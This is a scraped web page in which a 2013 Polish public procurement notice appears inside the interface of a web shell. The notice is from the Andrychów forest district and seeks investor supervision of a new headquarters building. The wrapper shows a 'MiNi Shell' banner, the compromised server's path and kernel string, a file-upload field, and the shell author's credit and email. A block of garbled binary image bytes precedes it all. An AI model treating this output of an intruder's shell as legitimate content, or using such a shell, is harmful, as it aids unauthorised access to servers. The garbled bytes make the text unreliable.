JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130121/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130121/11019-N-2013.html

<p class="kh_header"><b>Andrychów: Pełnienie nadzoru inwestorskiego nad realizacją zadania inwestycyjnego 
pn: Budowa budynku administracyjno mieszkalnego wielorodzinnego - siedziby Nadleśnictwa Andrychów.</b><br>
<b>Numer ogłoszenia: 11019 - 2013; data zamieszczenia: 21.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> PGL LP Nadleśnictwo Andrychów , ul. Grunwaldzka 10, 34-120 Andrychów, woj. małopolskie, tel. 033 8752015, faks 033 8752813.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa jednostka organizacyjna nie posiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie nadzoru inwestorskiego nad realizacją zadania inwestycyjnego 
pn: Budowa budynku administracyjno mieszkalnego wielorodzinnego - siedziby Nadleśnictwa Andrychów..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje pełnienie nadzoru inwestorskiego w rozumieniu ustawy z dnia 7 lipca 1994r Prawo budowlane -Dz.U z 2010 r nr 243 poz. 1623 z późn. zm.,  w specjalnościach:
-    konstrukcyjno - budowlanej;
-    instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, 
     wodociągowych i kanalizacyjnych;
-    instalacyjnej w zakresie sieci instalacji i urządzeń elektrycznych 
    i elektroenergetycznych.

2.Przedmiot zamówienia obejmuje 3 etapy.

Etap I -  Dokumentacja projektowa. 

Wykonawca - Inspektor Nadzoru sprawdza kompletność i weryfikuje projekt budowlany pod kątem wzajemnej zgodności składających się na niego opracowań.

Etap II - Wybór podmiotu, który będzie realizował zadanie inwestycyjne.

a) sprawdzenie zgodności kosztorysów ofertowych z przedmiarem i SIWZ,
b) sprawdzenie kosztorysów ofertowych pod względem formalno-rachunkowym,
c) weryfikacja  kosztorysów ofertowych w przypadku wystąpienia oczywistych omyłek

Etap III - Wykonanie i odbiór robót budowlanych w trakcie realizacji zadania   
              Inwestycyjnego.

a)  pełni obowiązki inspektora nadzoru inwestorskiego oraz zapewnia i koordynuje 
     pracę inspektorów nadzoru poszczególnych branż. 
     Zakres uprawnień i obowiązków inspektora nadzoru wynika z art. 25 i 26    
     ustawy z dnia 7 lipca 1994r Prawo budowlane  Dz. U. 2010 Nr 243 poz. 1623 
     z późn zm.

b)  zawiadomienie organu nadzoru budowlanego o terminie rozpoczęcia robót     
     z załączeniem oświadczeń kierownika budowy i inspektorów nadzoru,   
     potwierdzających przyjęcie obowiązków na budowie;
c)  przed rozpoczęciem prac budowlanych, upewnia się że spełnione zostały   
     wymagania dotyczące bezpieczeństwa i ochrony zdrowia oraz zatwierdza plan 
     BIOZ. Wstrzymuje roboty w przypadku prowadzenia ich niezgodnie   
     z przepisami BHP,  ppoż., oraz innymi;
d)  ściśle współpracuje z autorami projektu budowlanego;
e)  w razie pilnej konieczności Wykonawca -Inspektor Nadzoru zobowiązany jest 
     stawić się na placu budowy niezwłocznie, 
f)   przygotowuje dokumenty do przekazania placu budowy, 
g)  kontroluje prawidłowość wpisów dokonywanych w dzienniku budowy i wydaje 
     Wykonawcy robót budowlanych polecenia, potwierdzone wpisem w dzienniku 
     budowy, dotyczące: usunięcia nieprawidłowości lub zagrożeń, wykonania prób  
     lub badań wymagających odkrycia robót lub elementów zakrytych, 
     przedstawienia ekspertyz dotyczących prowadzonych robót budowlanych,
h)  sprawdza jakość i egzekwuje zgodność wykonywanych robót budowlanych    
     i wyrobów budowlanych z określonymi wymaganiami technicznymi, sztuką 
     budowlaną oraz zatwierdzonym decyzją projektem budowlanym, w tym 
     zapobiega zastosowaniu wyrobów budowlanych wadliwych i niedopuszczonych 
     do stosowania w budownictwie, niezgodnych z dokumentacją projektową,
i)   kontroluje i przechowuje dokumenty jakości, aprobaty techniczne, deklaracje  
     zgodności, atesty, protokóły badań, protokóły pomiarów, instrukcje obsługi   
     w celu nie dopuszczenia do zastosowania materiałów wadliwych lub nie
     dopuszczonych do stosowania w budownictwie w Polsce. Ocena ich zgodności 
     z dokumentacją projektową, a w przypadku zastosowania przez Wykonawcę 
     robót budowlanych materiałów i urządzeń równoważnych ocena ich 
     równoważności z przewidzianymi w dokumentacji technicznej w uzgodnieniu 
     z  autorem projektu i Inwestorem; 
j)   żąda od Wykonawcy robót budowlanych, dokonania poprawek bądź ponownego 
     wykonania wadliwie wykonanych robót, a także wstrzymania dalszych robót  
     budowlanych, w przypadku gdy ich kontynuacja mogłaby wywołać zagrożenie 
     bądź spowodować niedopuszczalną niezgodność z projektem lub pozwoleniem  
     na budowę;
k)  sprawdza i odbiera roboty budowlane ulegające zakryciu lub zanikające;
l)   uczestniczy w próbach i odbiorach technicznych instalacji, urządzeń
     technicznych i przewodów kominowych; 
ł)   Wykonawca- Inspektor Nadzoru ma obowiązek stwierdzenia aktualnego stanu   
     robót w razie przerwy w robotach oraz w innych wypadkach, gdy zachodzi  
     potrzeba ustalenia ilości i wartości robót w zakresie niezbędnym do rozliczeń 
     z Zamawiającym;
m) monitoruje terminowość realizacji robót budowlanych, a w przypadku zagrożenia 
     niedotrzymania terminów wynikających z Harmonogramu rzeczowo - 
     finansowego robót budowlanych  powiadamia pisemnie Zamawiającego; 
n)  organizuje narady budowy, co najmniej jeden raz w miesiącu, z udziałem 
     Wykonawcy robót budowlanych i przedstawicieli Zamawiającego, sporządza     
     z nich protokoły i przekazuje je zainteresowanym stronom w terminie do 5 dni 
     po naradzie;
o)  weryfikuje treść faktur wystawianych przez Wykonawcę robót budowlanych
     pod względem merytorycznym i rachunkowym i przekazuje w ciągu 2 dni   
      Zamawiającemu;
p)   potwierdza faktycznie wykonane roboty oraz usunięcie wad i usterek. 
r)    przygotowuje i przeprowadza odbiory częściowe i końcowy robót z udziałem 
      Zamawiającego; 
s)   zatwierdza rysunki wykonawcze i warsztatowe sporządzane przez wykonawcę 
      robót budowlanych;
t)    dokonuje akceptacji dokumentacji powykonawczej, wszelkich raportów, akt, 
      certyfikatów i innych dokumentów przygotowanych przez wykonawcę robót po 
      zakończeniu robót i przedkłada ją Zamawiającemu do zatwierdzenia;
3.   Zalecenia ogólne. 
a)  Wykonawca - Inspektor Nadzoru doradza  Zamawiającemu w zakresie roszczeń
     i sporów z wykonawcą robót oraz w zakresie problemów mogących się 
     pojawić  podczas prowadzenia robót
b)  w trakcie realizacji zadania inwestycyjnego Wykonawca - Inspektor Nadzoru 
     nadzoruje oraz monitoruje realizację zadania zgodnie z  Harmonogramem  
     rzeczowo - finansowym robót budowlanych  sporządzonym przez Wykonawcę 
     robót budowlanych, projektem budowlanym zatwierdzonym decyzją właściwego 
     organu, warunkami umowy  oraz obowiązującymi przepisami prawnymi
c)  wszystkie ważne informacje i decyzje niezbędne do realizacji zadania 
     przekazywane między Wykonawcą - Inspektorem Nadzoru a Wykonawcą robót
     budowlanych wymagają formy pisemnej. Wszystkie pisma Wykonawcy-   
     nspektora Nadzoru do Wykonawcy robót budowlanych winny być w kopii 
     przekazywane do wiadomości Zamawiającemu.
d)  zatwierdza, po uzgodnieniu z Zamawiającym, materiały i urządzenia rzewidziane 
     do zastosowania na etapie projektu jak i budowy.

3.  Obowiązki Wykonawcy- Inspektora Nadzoru związane z odbiorem robót
     i uzyskaniem pozwolenia na użytkowanie.

a)  przeprowadzenie kontroli przed odbiorem końcowym oraz przygotowanie listy 
     wad oraz innych brakujących dokumentów, które miały być złożone zgodnie z  
     umową przez wykonawcę robót.
b)  po zakończeniu robót Wykonawca - Inspektor Nadzoru potwierdza w dzienniku 
     budowy zapis kierownika budowy o gotowości odbioru oraz należyte 
     uporządkowanie terenu budowy.
c)  zweryfikowanie i zatwierdzenie kompletnej dokumentacji wykonawczej,  
    a następnie dostarczenie jej do Zamawiającego wraz z dokumentacją związaną 
    z nadzorowaną budową w formie ustalonej z Zamawiającym.
d)  współdziałanie z Wykonawcą robót i Zamawiającym w celu uzyskania 
     decyzji o pozwoleniu na użytkowanie.
e)  udział w odbiorze pogwarancyjnym oraz w trakcie zgłaszania reklamacji w
     ramach gwarancji udzielonej przez Wykonawcę robót budowlanych.

Zamawiający zastrzega, że jeżeli wystąpią roboty dodatkowe lub uzupełniające, Wykonawca - Inspektor Nadzoru wykonywać będzie nadzór nad nimi bez dodatkowego wynagrodzenia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.70.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.12.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający żąda od Wykonawców wniesienia wadium w wysokości:
    1 500,00 zł,   słownie: jeden tysiąc pięćset złotych.

2. Wykonawca, który nie wniesie wadium w terminie wyznaczonym na składanie 
   ofert, zostanie wykluczony z postępowania, a jego oferta zostanie uznana za  
   odrzuconą.

3. Wadium musi być wniesione przed upływem terminu składania ofert tj. 
    do  28 stycznia 2013 r. do godz. 11:00.

4. Wadium może być wniesione w formach określonych w art. 45 ust. 6 ustawy Pzp.
5. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy 
    zamawiającego nr konta 28 2030 0045 1110 0000 0148 0500 w banku BGŻ 
    o/Wadowice z dopiskiem - wadium nadzór inwestorski. 
    Zaleca się dołączenie do  oferty potwierdzonej za zgodność z oryginałem kopii 
    przelewu kwoty wadium.
6.  Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli znajdzie się na 
    rachunku bankowym zamawiającego przed upływem terminu składania ofert.
7.  W zakresie wadium obowiązują uregulowania określone w art. 45 i 46 ustawy
     Pzp.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest wykazać, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy to w tym okresie, nadzorowali realizację co najmniej 2 ukończonych obiektów użyteczności publicznej, w tym jeden o pow. użytkowej co najmniej 900 m2. Należy dołączyć dokumenty potwierdzające, że roboty te zostały prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że:
- dysponuje bądź będzie dysponować osobami zdolnymi do realizacji przedmiotu 
   zamówienia tj. co najmniej: inspektorem nadzoru-koordynatorem, inspektorami   
   w specjalnościach: konstrukcyjno-budowlanej, instalacyjnej w zakresie sieci,  
   instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i 
   kanalizacyjnych,  instalacyjnej w zakresie sieci, instalacji i urządzeń 
   elektrycznych i elektroenergetycznych, wraz z informacjami na temat ich 
   kwalifikacji zawodowych wydanych na podstawie obowiązujących przepisów lub  
   odpowiadające im ważne uprawnienia budowlane, a które uprawniają do pełnienia 
   tych funkcji w przedmiotowym zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony wówczas, gdy Wykonawca przedstawią polisę lub inny dokument potwierdzający, ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę nie mniejszą niż 500 000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Jeżeli Wykonawca, wykazując spełnienie warunków udziału w postępowaniu polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2 b ustawy Pzp, a podmioty te będą brały udział w realizacji części zamówienia, Zamawiający żąda od Wykonawcy przedstawienia w odniesieniu do tych podmiotów dokumentów 
wymienionych w pkt. III.3, III.4.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania istotnych zmian postanowień zawartej umowy zgodnie z §14 zawartym w projekcie umow</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.katowice.lasy.gov.pl/andrychow<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> PGL LP Nadleśnictwo Andrychów, ul. Grunwaldzka 10, 34-120 Andrychów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.01.2013 godzina 11:00, miejsce: Siedziba Nadleśnictwa Andrychów - 34-120 Andrychów, ul. Grunwaldzka 10 - sekretariat (pokój nr 8).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com